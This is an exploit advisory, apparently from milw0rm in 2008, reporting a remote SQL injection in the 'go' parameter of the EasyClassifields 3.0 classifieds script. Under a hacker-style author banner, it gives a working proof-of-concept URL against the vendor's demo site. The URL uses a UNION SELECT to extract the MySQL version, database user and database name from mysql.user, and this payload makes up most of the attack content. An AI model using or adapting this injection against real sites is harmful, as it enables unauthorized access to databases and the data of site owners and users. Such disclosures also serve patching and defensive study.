EasyClassifields 3.0 go Remote SQL Injection Vulnerability.pdf

1 ##############EasyClassifields v3.0 SQL Injection####################### 2 3 ####By: e.wiZz! 4 ####Info: Bosnian Idiot FTW! 5 ####Site: infected.blogger.ba 6 ####Greetz: Luigi,suN8Hclf,str0ke 7 In the wild... 8 9 ################################################################## 10 11 ###Script Site: http://myiosoft.com/?1.6.0.0 12 ###Vulnerability: 13 14 http://www.inthewild.xxx/path/index.php?PageSection=x&page=browse&go=<sql> 15 16 PoC on demo site: 17 18 http://myiosoft.com/products/EasyClassifields/demo/staticpages/easyclassifields/index.php?PageSection=0&page=browse&g o=−1%20union%20select%20all%20concat(0x3a,version(),0x3a,user(),0x3a,0x3a,database()),2%20from%20mysql.user 19 20 # milw0rm.com [2008−09−01] Page 1/1 EasyClassifields 3.0 go Remote SQL Injection Vulnerability e.wiZz! 09/01/2008